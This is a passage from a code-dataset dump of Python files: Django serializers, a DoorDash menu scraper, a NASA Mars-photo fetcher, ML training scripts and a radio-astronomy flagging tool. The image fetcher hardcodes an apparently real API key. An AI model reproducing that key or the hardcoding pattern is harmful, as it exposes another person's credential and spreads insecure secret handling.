current\n","sub_path":"sample_app/fibonacci/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509864111","text":"import promote\nimport h2o\nimport os\n\nh2o.init()\n\nmodel_path = os.path.abspath('./objects/DRF_model_python_1524085511585_1')\nmodel = h2o.load_model(model_path)\n\ndef helloh2o(data):\n # first transfrom our JSON into an H2OFrame\n h2o_data = h2o.H2OFrame(data)\n # Predict!\n res = model.predict(h2o_data).as_data_frame().to_dict()\n return {'response': res}\n\nUSERNAME = 'ross'\nAPI_KEY = 'your_api_key'\nPROMOTE_URL = \"https://promote.c.yhat.com/\"\n\n\np = promote.Promote(USERNAME, API_KEY, PROMOTE_URL)\n\n# add metadata\np.metadata.logloss = float(\"{0:.5f}\".format(model.logloss()))\n\n# test data\nTESTDATA = {\"C1\":4.9,\"C2\":3,\"C3\":1.4,\"C4\":0.2}\n\n# test model locally\nprint(helloh2o(TESTDATA))\n\n# test that TESTDATA is valid json\np.deploy(\"helloh2o\", helloh2o, TESTDATA, confirm=True, dry_run=False, verbose=1)","sub_path":"examples/h2o-classifier/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"433889798","text":"import pypandoc\nimport setuptools\n\nlong_description = pypandoc.convert_file(\"../README.org\", \"md\")\n\nsetuptools.setup(\n name=\"bridge-sim-barischrooneyj\", # Replace with your own username\n version=\"0.0.5\",\n author=\"Jeremy Barisch-Rooney\",\n author_email=\"barischrooneyj@protonmail.com\",\n description=\"A Python library for concrete slab bridge simulation.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/barischrooneyj/bridge-sim\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=3.7\",\n)\n","sub_path":"src/setup_.py","file_name":"setup_.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"231162740","text":"from django.contrib.auth.models import Group\nfrom rest_framework import serializers\n\nfrom .models import *\n\n# admin endpoints\n\n\nclass GroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = ('id', 'name', )\n\n def validate_name(self, name):\n return name\n\n\nclass UserSerializer(serializers.ModelSerializer):\n # groups = GroupSerializer(many=True, required=False, allow_null=True)\n\n class Meta:\n model = User\n fields = ('username', 'password', 'first_name', 'last_name', 'email', 'groups')\n read_only_fields = ('is_staff', 'is_superuser', 'is_active', 'date_joined',)\n\n def create(self, validated_data):\n password = validated_data.pop('password')\n groups = validated_data.pop('groups')\n\n u = User.objects.create(**validated_data)\n u.set_password(password)\n u.save()\n\n if groups:\n for g in groups:\n group = Group.objects.get(id=g)\n u.groups.add(group)\n else:\n group = Group.objects.get(name__icontains='customer')\n u.groups.add(group)\n\n return u\n\n def update(self, instance, validated_data):\n groups = validated_data.pop('groups')\n\n instance.groups.clear()\n\n for g in groups:\n group = Group.objects.get(name__icontains=g.name)\n instance.groups.add(group)\n\n instance.username = validated_data['username']\n instance.first_name = validated_data['first_name']\n instance.last_name = validated_data['last_name']\n instance.email = validated_data['email']\n\n instance.save()\n\n return instance\n\n\n# other endpoints\nclass ImageSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProductImage\n fields = ('id', 'image', 'product_item')\n\n def get_group_names(self):\n user = self.context['request'].user\n user_groups = user.groups.all()\n group_names = []\n\n for u in user_groups:\n group_names.append(u.name)\n\n return group_names\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n if 'product_manager' in self.get_group_names():\n image = ProductImage.objects.create(**validated_data)\n image.save()\n Task.objects.create(description='User ' + user.username + 'has created image.', security_level='M').save()\n else:\n raise serializers.ValidationError('You need to be a staff user to create images')\n return image\n\n def update(self, instance, validated_data):\n user = self.context['request'].user\n\n if 'product_manager' in self.get_group_names():\n instance.product_item = validated_data['product_item']\n instance.save()\n Task.objects.create(description='User ' + user.username + 'has updated image.', security_level='M').save()\n else:\n raise serializers.ValidationError('You need to be a staff user to update images')\n\n return instance\n\n\nclass TagSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = ('id', 'name', 'product_item')\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n if user.is_staff:\n tag = Tag.objects.get_or_create(**validated_data)\n tag.save()\n Task.objects.create(description='User ' + user.username + 'has created a tag.', security_level='L').save()\n else:\n raise serializers.ValidationError('You need to be a staff user to update products')\n\n return tag\n\n def update(self, instance, validated_data):\n user = self.context['request'].user\n\n if user.is_staff:\n instance.name = validated_data['name']\n instance.product_item = validated_data ['product_item']\n instance.save()\n Task.objects.create(description='User ' + user.username + 'has updated a tag.', security_level='L').save()\n else:\n raise serializers.ValidationError('You need to be a staff user to update products')\n\n return instance\n\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n images = ImageSerializer(many=True)\n tags = TagSerializer(many=True)\n\n class Meta:\n model = Product\n depth = 1\n fields = ('id', 'title', 'description', 'postdate', 'price', 'images', 'tags')\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n validated_data.pop('images')\n if user.is_staff:\n product = Product.objects.create(**validated_data)\n product.save()\n Task.objects.create(description='User' + user.username + ' has created a new product.', security_level='H')\\\n .save()\n else:\n raise serializers.ValidationError('You need to be a staff user to create products')\n return product\n\n def update(self, instance, validated_data):\n user = self.context['request'].user\n\n if user.is_staff:\n instance.title = validated_data['title']\n instance.description = validated_data['description']\n instance.price = validated_data['price']\n instance.save()\n Task.objects.create(description='User ' + user.username + ' has updated product.', security_level='H')\\\n .save()\n else:\n raise serializers.ValidationError('You need to be a staff user to update products')\n\n return instance\n\n\nclass PurchasedProductSerializer(serializers.ModelSerializer):\n price = serializers.FloatField(source='product.price')\n product_id = serializers.IntegerField(source='product.id')\n product_name = serializers.CharField(source='product.title')\n\n class Meta:\n model = PurchasedProduct\n fields = ('id', 'product_id', 'product_name', 'quantity', 'price')\n\n def create(self, validated_data):\n user = self['request'].user\n\n p = PurchasedProduct.objects.create(**validated_data)\n p.save()\n Task.objects.create(description='User ' + user.username + ' has purchased item.' + self.product_id, security_level='H').save()\n return p\n\n\nclass ReceiptSerializer(serializers.ModelSerializer):\n product = PurchasedProductSerializer(source='purchasedproduct_set', many=True)\n\n class Meta:\n model = Receipt\n fields = ('id', 'customer', 'product', 'total_charge')\n\n def create(self, validated_data):\n user = self['request'].user\n products = validated_data.pop('purchasedproduct_set')\n\n total_charge = 0\n\n r = Receipt.objects.create(customer=self.context['request'].user,**validated_data)\n\n for product in products:\n p = Product.objects.get(id=product.pop('product')['id'])\n purchased = PurchasedProduct.objects.create(receipt=r, product=p, quantity=product.get('quantity'))\n r.purchasedproduct_set.add(purchased)\n total_charge += (p.price * product.get('quantity'))\n\n r.total_charge = total_charge\n r.save()\n Task.objects.create(description='User ' + user.username + 'has generated receipt').save()\n\n return r\n\n\nclass UserInformationSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = UserInformation\n fields = '__all__'\n\n def create(self, validated_data):\n\n user = self.context['request'].user\n\n userModel = UserInformation.objects.create(**validated_data, user=user)\n userModel.save()\n Task.objects.create(description='User ' + user.username + 'has created address.').save()\n\n return userModel\n\n\nclass TaskSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Task\n fields = '__all__'\n","sub_path":"productapi/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"184281058","text":"#Imports\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import ImageDraw, Image\r\n\r\ndef Sort_Tuple(tup): \r\n\treturn(sorted(tup, key = lambda x: x[2],reverse = True))\r\n\r\ndef plot_boxes(output_location, image, pred): # Write the required arguments\r\n\r\n\t# The function should plot the predicted boxes on the images and save them.\r\n\t# Tip: keep the dimensions of the output image less than 800 to avoid RAM crashes.\r\n\timage = Image.fromarray((np.transpose(image,(1,2,0))*255).astype(np.uint8))\r\n\t#pred = zip(pred_boxes, pred_class, pred_score)\r\n\tn = len(pred[1])\r\n\r\n\tif n<=5:\r\n\t\tfor i in range(n):\r\n\t\t\ttext = pred[1][i]\r\n\t\t\tshape = pred[0][i]\r\n\t\t\timg = ImageDraw.Draw(image)\r\n\t\t\timg.text([shape[0][0],shape[1][1]],text)\r\n\t\t\timg.rectangle(shape, outline = 'red')\r\n\t\timage.save(output_location)\r\n\t\treturn image\r\n\r\n\telse:\r\n\t\ti = 0\r\n\t\twhile i<5:\r\n\t\t\tmaxi = 0\r\n\t\t\tmax = 0\r\n\t\t\tfor j in range(n):\r\n\t\t\t\tif pred[2][j]>max:\r\n\t\t\t\t\tmax = pred[2][j]\r\n\t\t\t\t\tmaxi = j\r\n\t\t\ttext = pred[1][maxi]\r\n\t\t\tshape = pred[0][maxi]\r\n\t\t\timg = ImageDraw.Draw(image)\r\n\t\t\timg.text([shape[0][0],shape[1][1]],text)\r\n\t\t\timg.rectangle(shape, outline = 'red')\r\n\t\t\tpred[2][maxi] = -2\r\n\t\t\ti+=1\r\n\t\timage.save(output_location)\r\n\t\treturn image\r\n\t\t","sub_path":"Python_DS_Assignment/AssignmentQs2/my_package/analysis/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"582109262","text":"from cx_Freeze import setup, Executable\n\nbuild_exe_options = {\"packages\": ['os', 'cffi', 'idna']}\n\n\nsetup(name=\"freeradius user management\",\n version=\"0.1\",\n description=\"Software for user management in freeRadius\",\n options={\"build_exe\": build_exe_options},\n executables=[Executable(\"main.py\", base=\"Win32GUI\")])","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"150949247","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\n\nclass Item:\n \"\"\"Object representing one DoorDash item\"\"\"\n def __init__(self, name, description, modifier_groups):\n self.name = name\n self.description = description\n self.modifier_groups = modifier_groups\n self.template_item = None\n def addModifierGroup(self, group):\n self.modifier_groups.append(group)\n def getIssues(self):\n \"\"\"Returns list of Issue objects corresponding to all of the issues with the Item and its child ModifierGroup objects\"\"\"\n real_groups = self.modifier_groups.copy()\n template_groups = self.template_item.modifier_groups.copy()\n\n output = []\n if(self.description != self.template_item.description):\n output.append(Issue(\"Item\", self.template_item.name, \"Incorrect description: menu lists '\" + self.description + \"' instead of '\" + self.template_item.description))\n groups_to_compare = []\n for t_group in template_groups:\n if(t_group.name in [i.name for i in real_groups]):\n real_groups[[i.name for i in real_groups].index(t_group.name)].template_group = t_group\n groups_to_compare.append(real_groups[[i.name for i in real_groups].index(t_group.name)])\n else:\n output.append(Issue(\"Modifier Group\", self.name, t_group.name + \" is missing!\"))\n for r_group in real_groups:\n if(r_group.name not in [i.name for i in groups_to_compare]):\n output.append(Issue(\"Modifier Group\", self.name, \"Extraneous modifier group \" + r_group.name + \" found\"))\n for g in groups_to_compare:\n output.extend(g.getIssues(g.template_group))\n return output\n\nclass ModifierGroup:\n \"\"\"Object representing a modifier group on DoorDash\"\"\"\n def __init__(self, name, modifiers):\n self.name = name\n self.modifiers = modifiers\n self.parent = None\n self.template_group = None\n def addModifier(self, modifier):\n self.modifiers.append(modifier)\n def getIssues(self, template_group):\n \"\"\"Returns a list of Issue objects corresponding to the discrepancies between self and template_group\"\"\"\n self.template_group = template_group\n output = []\n if(self.name != self.template_group.name):\n output.append(Issue(\"Modifier Group\", self.parent.name + \"/\" + self.template_group.name, \"Name does not match template\"))\n if(len(self.modifiers) < len(self.template_group.modifiers)):\n missing = set(self.template_group.modifiers) - set(self.modifiers)\n output.append(Issue(\"Modifier Group\", self.parent.name + \"/\" + self.template_group.name, \"Missing modifiers\"))\n elif(len(self.modifiers) > len(self.template_group.modifiers)):\n output.append(Issue(\"Modifier Group\", self.parent.name + \"/\" + self.template_group.name, \"Too many modifiers\"))\n else:\n o=[]\n if(self.modifiers != self.template_group.modifiers):\n for i in range(0, len(self.modifiers)):\n if(sorted(self.modifiers)[i] != sorted(self.template_group.modifiers)[i]):\n o.append(Issue(\"Modifier\", self.parent.name + \"/\" + self.template_group.name, \"Menu lists modifier as \" + sorted(self.modifiers)[i] + \" instead of \" + sorted(self.template_group.modifiers)[i]))\n if(not o):\n pass\n #o.append(Issue(\"Modifier Group\", self.parent.name + \"/\" + self.template_group.name, \"Modifiers scrambled within modifier group - adjust order of modifiers to match template\"))\n output.extend(o)\n return output\n\nclass Issue:\n \"\"\"Object representing one issue with a menu\"\"\"\n def __init__(self, level, location, body):\n self.level = level\n self.location = location\n self.body = body\n def output(self):\n return self.level + \" - \" + self.location + \" - \" + self.body\n\nclass Menu:\n \"\"\"Object representing a DoorDash Menu\"\"\"\n def __init__(self, address, template_menu):\n self.items = []\n self.categories = []\n self.address = address\n self.template_menu = template_menu\n self.issues = []\n def loadItems(self, deep_link):\n \"\"\"Scrapes DoorDash menu page for all the necessary data and loads it into Item and ModifierGroup objects within the Menu object\"\"\"\n #Load webpage\n driver = webdriver.Chrome(executable_path=\"C:/Users/creek/Desktop/ChromeDriver/chromedriver.exe\")\n driver.get(deep_link)\n\n #Enter address\n dummy = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"input[placeholder='Address']\")))\n time.sleep(1)\n address_field = driver.find_element_by_css_selector(\"input[placeholder='Address']\")\n address_field.send_keys(self.address)\n time.sleep(0.5)\n address_field.send_keys(Keys.ENTER)\n time.sleep(1)\n driver.find_element_by_css_selector(\"button[data-anchor-id='AddressEditSave']\").click()\n time.sleep(1)\n\n #Load categories\n category_list = driver.find_elements_by_css_selector(\"h2[data-category-scroll-selector]\")\n category_texts = [e.text for e in category_list]\n try:\n category_texts.remove(\"Popular Items\")\n except:\n pass\n self.categories = category_texts\n print(self.categories)\n\n #Load items\n #items are located by searching rectangular buttons\n item_button_list = driver.find_elements_by_xpath(\"//button[@shape='Rectangle']\")\n actions = ActionChains(driver)\n for i in item_button_list:\n #moves item listing to center of page\n driver.execute_script(\"var viewPortHeight = Math.max(document.documentElement.clientHeight, window.innerHeight || 0);\"\n + \"var elementTop = arguments[0].getBoundingClientRect().top;\"\n + \"window.scrollBy(0, elementTop-(viewPortHeight/2));\", i)\n \n #click on item\n i.click()\n\n #wait until close item listing button is on page to move on\n dummy = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"button[aria-label*='Close']\")))\n \n #header_description holds the text for the title and description\n header_description = i.text.split(\"\\n\")\n item_title = header_description[0]\n\n #if there is a description pull it, otherwise no description\n try:\n item_description = header_description[1]\n except:\n item_description = \"\"\n # header_description = driver.find_elements_by_css_selector(\"span[overflow='normal'][display='block']\")\n # item_title = header_description[0].text\n # item_description = header_description[1].text\n close = driver.find_element_by_css_selector(\"button[aria-label*='Close']\")\n\n #if the item has already been loaded, don't load it again (Popular Items section)\n if item_title in [i.name for i in self.items]:\n close.click()\n continue\n\n print(\"Item Title: \" + item_title)\n print(\"Item Description: \" + item_description)\n time.sleep(0.5)\n menu_modal_body = driver.find_element_by_css_selector(\"div[data-anchor-id='MenuItemModalBody']\")\n mgroups = []\n try:\n modifier_groups = menu_modal_body.find_elements_by_css_selector(\"div[role='group']\")\n for group in modifier_groups:\n modifier_containers = group.find_elements_by_xpath(\"*\")\n #print([mod.get_attribute(\"innerHTML\") for mod in modifier_containers])\n group_title_container = modifier_containers.pop(0).find_element_by_css_selector(\"div\").find_elements_by_css_selector(\"span\")\n group_title = group_title_container[0].text\n group_number_tag = group_title_container[1].text\n modifiers = []\n for div in modifier_containers:\n #print(div.get_attribute('innerHTML'))\n modifiers.append(div.find_element_by_css_selector(\"div\").find_element_by_css_selector(\"span\").text)\n #print(\"Modifier group: \" + group_title)\n #print(\"Number tag: \" + group_number_tag)\n # for modifier in modifiers:\n # #print(modifier)\n # pass\n mgroups.append(ModifierGroup(group_title, modifiers))\n except NameError:\n print(\"no modifiers for this item\")\n item = Item(item_title, item_description, mgroups)\n\n #MG object needs to know its parent to generate correct location in getIssues()\n for mgroup in item.modifier_groups:\n mgroup.parent = item\n \n self.items.append(item)\n close = driver.find_element_by_css_selector(\"button[aria-label*='Close']\")\n close.click()\n time.sleep(0.5)\n driver.close()\n def compare(self):\n \"\"\"Compares the loaded menu with a template (set by the template_menu property) and outputs a list of Issue objects\"\"\"\n real_items = self.items.copy()\n template_items = self.template_menu.items.copy()\n real_categories = self.categories.copy()\n template_categories = self.template_menu.categories.copy()\n output = []\n\n items_to_compare = []\n\n #compare categories\n to_remove = [\"Drinks\", \"Desserts\", \"Beverages\"]\n for r in to_remove:\n try:\n real_categories.remove(r)\n except:\n pass\n\n for t_category in template_categories:\n if(t_category not in real_categories):\n output.append(Issue(\"Category\", t_category, t_category + \" is missing!\"))\n for e_category in real_categories:\n if(e_category not in template_categories):\n output.append(Issue(\"Category\", e_category, \"Category \" + e_category + \" not on template menu\"))\n \n if(self.categories[0] != \"Bao\"):\n output.append(Issue(\"Category\", \"Layout\", \"First category on menu not Bao\"))\n\n #compare lists of items\n for t_item in template_items:\n if(t_item.name in [i.name for i in real_items]):\n real_items[[i.name for i in real_items].index(t_item.name)].template_item = t_item\n items_to_compare.append(real_items[[i.name for i in real_items].index(t_item.name)])\n else:\n output.append(Issue(\"Item\", t_item.name, t_item.name + \" is missing!\"))\n for r_item in real_items:\n if(r_item.name not in [i.name for i in items_to_compare]):\n output.append(Issue(\"Item\", r_item.name, \"Extraneous item \" + r_item.name + \" found\"))\n \n print(\"Comparing \" + str(len(items_to_compare)) + \" items\")\n\n #compare each item\n #TODO: make this use inheritance and polymorphism and all that jazz to not fucking suck lol\n # for item in items_to_compare:\n # if(item.modifier_groups and item.template_item.modifier_groups):\n # for i in range(min(len(item.modifier_groups), len(item.template_item.modifier_groups))):\n # item.modifier_groups[i].template_group = item.template_item.modifier_groups[i]\n for item in items_to_compare:\n output.extend(item.getIssues())\n\n \n issues = output\n \n return output\n \n \n\n\n\n \n ","sub_path":"MenuAuditmator.py","file_name":"MenuAuditmator.py","file_ext":"py","file_size_in_byte":12098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"440865186","text":"import requests\nimport json\nimport os\n\nclass ImageSourcer:\n\n # Constructor initialising attributes\n def __init__(self, rover, sol, camera, index):\n apiKey = \"lORFMg7rox7XMLBWzM1byE9fd5WAe3Cf9KkoQYmp\"\n self.rover = rover\n self.sol = sol\n self.camera = camera\n self.responseString = (\"https://api.nasa.gov/mars-photos/api/v1/rovers/\" + self.rover + \"/photos?sol=\"\n + self.sol + \"&camera=\" + self.camera + \"&api_key=\" + apiKey)\n self.index = index\n\n def __call__(self):\n return (self.index)\n\n # Write links to images to text file\n '''def writeToFile(self, data, fileName):\n textFile = open(fileName, \"w\")\n for entry in data[\"photos\"]:\n print(entry[\"img_src\"])\n textFile.write(entry[\"img_src\"])\n textFile.write(\"\\n\")'''\n\n def returnURL(self, data):\n return data[\"photos\"][self.index][\"img_src\"]\n\n # Send API request for JSON object\n def receiveImages(self):\n response = requests.get(self.responseString)\n\n # Check to see if request OK\n if (response.status_code != 200):\n print (\"API Request failed\")\n else:\n data = response.json()\n\n # Create file name and store in folder 'images'\n fileName = self.rover + \"-\" + self.sol + \".txt\"\n completeFileName = os.path.join(\"images/\", fileName)\n\n # Remove file if already exists for parameters, to allow new data\n # to be retrieved\n if (os.path.isfile(completeFileName)):\n os.remove(completeFileName)\n else:\n return self.returnURL(data)\n\n\n#img1 = ImageSourcer(\"Curiosity\", \"1000\", 0)\n#link = img1.receiveImages()\n#print(link)\n","sub_path":"SpaceHack/ImageSourcer.py","file_name":"ImageSourcer.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268884109","text":"import os\nimport glob\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nimport tensorflow as tf\nimport gpflow\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\ntarin_path = './conll_train'\ndev_path = './conll_dev'\n\nnp.random.seed(1)\n\ndef Load_Data(A, Comp_dims, path='./conll_train', sample = None, replace = False):\n x_comp_data = []\n y_label = []\n name = path.split(\"_\")[-1]\n print(f\"Loading {name} Data...\")\n dir = os.path.dirname(__file__)\n\n x_file_list = glob.glob(os.path.join(dir, path + \"/*.x\"))\n y_file_list = glob.glob(os.path.join(dir, path + \"/*.y\"))\n\n if sample == None:\n pass\n else:\n Num = len(x_file_list)\n sam_ind = np.random.choice(range(Num), round(sample * Num), replace = replace)\n x_file_list = [x_file_list[I] for I in sam_ind]\n y_file_list = [y_file_list[I] for I in sam_ind]\n \n print(f\"Parsing {len(x_file_list)} xfiles and {len(y_file_list)} yfiles.\")\n\n\n for X, y in list(zip(x_file_list, y_file_list)):\n len_of_y = 0\n with open(y, \"r\") as yf:\n y_content = [int(row.strip()) for row in yf.readlines()]\n len_of_y = len(y_content)\n y_label.append(y_content)\n\n with open(X, \"r\") as xf:\n compX = []\n content = [row.strip() for row in xf.readlines()]\n for ind in range(1, len_of_y + 1):\n X_data = np.mat(np.zeros((Comp_dims, 1)))\n for c in content:\n tran = [int(t) for t in c.split()]\n if tran[0] == ind:\n X_data += A[:, tran[1]]\n if compX == []:\n compX = X_data\n else:\n compX = np.concatenate([compX, X_data], axis = 1)\n \"\"\"\n the label is like:\n 0 2\n the X data is like: shape like (Comp_dims, len of label)\n [[18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]]\n \"\"\"\n x_comp_data.append(compX.T)\n Y = np.concatenate(y_label, axis = 0)\n Y = np.array(Y, dtype = np.float64)\n Y = Y[:, None]\n\n return np.concatenate(x_comp_data, axis = 0), Y\n\n\ndef softmax_classfier(input_data, label, Comp_dims, class_num, X_test, y_test):\n # print(input_data.shape)\n # print(label.shape)\n input_in = tf.placeholder(tf.float32, shape=(None, Comp_dims), name=\"input_data\")\n lab = tf.placeholder(tf.int32, shape=(None,), name=\"label\")\n\n pred = tf.layers.dense(input_in, class_num, activation=tf.nn.softmax)\n # print(pred.get_shape())\n y_label = tf.one_hot(lab, class_num)\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(\n logits = pred, \n labels = y_label\n )\n loss = tf.reduce_mean(cross_entropy, name = \"loss\")\n opt = tf.train.AdamOptimizer(0.1).minimize(loss)\n acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(pred, 1), tf.argmax(y_label, 1)), dtype = tf.float32), name = \"accuracy\")\n\n init = tf.global_variables_initializer()\n\n with tf.Session() as s:\n s.run(init)\n s.run(opt, feed_dict={input_in: input_data, lab: label})\n train_acc = s.run(acc, feed_dict={input_in: input_data, lab: label})\n test_acc = s.run(acc, feed_dict={input_in: X_test, lab: y_test})\n\n return train_acc, test_acc\n\n\ndef SVGP(X, y, X_test, y_test, C_num, start = 1):\n \"\"\"\n the X should like: (batch_size, dims)\n the y should like: (batch_size, 1) and start with 0 not 1\n \"\"\"\n dims = X.shape[1]\n y = y - start\n\n max_sample = 1700\n\n # sample_rate = 0.3\n sample_num = max_sample if X.shape[0] > max_sample else X.shape[0]\n # print(f\"x shape is {sample_num}\")\n\n sample_index = np.random.choice(range(X.shape[0]), sample_num, replace = False)\n sample_index.sort()\n\n # print(f\"the shape is{sample_index}\")\n\n SVGP = gpflow.models.SVGP(\n X, y, \n kern=gpflow.kernels.RBF(dims) + gpflow.kernels.White(dims, variance = 0.01), \n Z=X[sample_index, :].copy(),\n likelihood=gpflow.likelihoods.MultiClass(C_num), \n num_latent=C_num, \n whiten=True, \n q_diag=True\n )\n\n gpflow.train.ScipyOptimizer().minimize(SVGP)\n\n p_train, _ = SVGP.predict_y(X)\n\n p_test, _ = SVGP.predict_y(X_test)\n\n train_pred = np.argmax(p_train, axis=1) + start\n test_pred = np.argmax(p_test, axis=1) + start\n\n train_acc = accuracy_score(y, train_pred)\n test_acc = accuracy_score(y_test, test_pred)\n\n # return pred + start\n return train_acc, test_acc\n\n\ndef main():\n\n D = 2035523\n # define the dimentional of give example sparse matrix.\n\n Comp_dims = 90\n #define the dimentional of compressed matrix.\n\n Miu = 0\n Sigma = 1\n # A = Miu + np.mat(np.random.randn(Comp_dims, D)) * Sigma\n\n A = np.mat(np.random.normal(Miu, Sigma, (Comp_dims, D)))\n\n # y = A * s, the s is sparse-matrix. the y is compressed measurements.\n\n C = 23\n # C = 22\n\n X_train, y_train = Load_Data(A, Comp_dims, sample=0.05)\n X_dev, y_dev = Load_Data(A, Comp_dims, path=dev_path, sample=0.015)\n\n print(\"free the A memory...\")\n import gc\n del A\n gc.collect()\n\n print(\"start training...\")\n\n # print(y_dev)\n\n train_acc, dev_acc = SVGP(X_train, y_train, X_dev, y_dev, C, 0)\n\n print(f\"the train accuracy is {train_acc}\")\n\n print(f\"the cross validation accuracy is {dev_acc}\")\n\n # print(y_dev_pred)\n\n # train_acc, dev_acc = softmax_classfier(X_train, y_train, Comp_dims, C, X_dev, y_dev)\n\n\nif __name__ == '__main__':\n main()","sub_path":"SVGP_83.py","file_name":"SVGP_83.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522277531","text":"#!/usr/bin/env python\nimport matplotlib as mpl\nmpl.rcParams.update({'font.size': 11, 'font.family': 'serif'})\n# mpl.use('Agg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom optparse import OptionParser\nimport os\nimport sys\nimport numpy as np\nimport xarray as xr\nimport dask\nimport dask.array as da\nfrom dask.diagnostics import ProgressBar\nfrom surfvis.utils import flagchisq\nfrom daskms import xds_from_ms, xds_from_table, xds_to_table\n\n\ndef create_parser():\n parser = OptionParser(usage='%prog [options] msname')\n parser.add_option('--rcol', default='RESIDUAL', help='Residual column (default = RESIDUAL)')\n parser.add_option('--wcol', default='WEIGHT_SPECTRUM', help='Weight column (default = WEIGHT_SPECTRUM)')\n parser.add_option('--fcol', default='FLAG', help='Flag column (default = FLAG)')\n parser.add_option('--sigma', default=10, type=float, help='chisq threshold (default = 25)')\n parser.add_option('--nthreads', default=4, type=int, help='Number of dask threads to use')\n parser.add_option('--nrows', default=10000, type=int, help='Number of rows in each chunk (default=10000)')\n parser.add_option('--nfreqs', default=128, type=int, help='Number of frequencies in a chunk (default=128)')\n parser.add_option(\"--use-corrs\", type=str, help='Comma seprated list of correlations to use (do not use spaces)')\n return parser\n\ndef main():\n (options,args) = create_parser().parse_args()\n\n # Some error trapping\n if len(args) != 1:\n print('Please specify a single Measurement Set to plot.')\n sys.exit(-1)\n else:\n msname = args[0].rstrip('/')\n\n schema = {}\n schema[options.rcol] = {'dims': ('chan', 'corr')}\n schema[options.wcol] = {'dims': ('chan', 'corr')}\n schema[options.fcol] = {'dims': ('chan', 'corr')}\n\n xds = xds_from_ms(msname,\n columns=[options.rcol, options.wcol, options.fcol],\n chunks={'row': options.nrows, 'chan': options.nfreqs},\n group_cols=['FIELD_ID', 'DATA_DESC_ID', 'SCAN_NUMBER'],\n table_schema=schema)\n\n if options.use_corrs is None:\n print('Using only diagonal correlations')\n if len(xds[0].corr) > 1:\n use_corrs = [0, -1]\n else:\n use_corrs = [0]\n else:\n use_corrs = list(map(int, options.use_corrs.split(',')))\n print(f\"Using correlations {use_corrs}\")\n\n out_data = []\n for i, ds in enumerate(xds):\n resid = ds.get(options.rcol).data\n weight = ds.get(options.wcol).data\n flag = ds.get(options.fcol).data\n\n uflag = flagchisq(resid, weight, flag, tuple(use_corrs), sigma=options.sigma)\n\n out_ds = ds.assign(**{options.fcol: ((\"row\", \"chan\", \"corr\"), uflag)})\n out_data.append(out_ds)\n\n writes = xds_to_table(out_data, msname, columns=[options.fcol])\n\n with ProgressBar():\n dask.compute(writes)\n","sub_path":"surfvis/flagchi2.py","file_name":"flagchi2.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"638248956","text":"import time\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn import linear_model as lm\nfrom sklearn.ensemble import RandomForestClassifier as rf\n\nimport sys\n\n\nclass Train():\n def __init__(self, train_data, train_labels, test_data, test_labels):\n self.train_data = train_data\n self.train_labels = train_labels\n self.test_data = test_data\n self.test_labels = test_labels\n\n\n def run(self, parameters, m_name):\n\n #print('# of train:', len(self.train_labels), '# of test:', len(self.test_labels))\n\n start_time = time.time()\n best_estimaters, best_scores = [], []\n\n if m_name==\"LR\":\n clf = RandomizedSearchCV(lm.LogisticRegression(), parameters, n_iter=50, scoring='f1', n_jobs=-1)\n #clf = RandomizedSearchCV(lm.LogisticRegression(), parameters, n_iter=50, scoring='f1', n_jobs=10)\n elif m_name==\"RF\":\n clf = RandomizedSearchCV(rf(), parameters, n_iter=50, scoring='f1', n_jobs=-1)\n #clf = 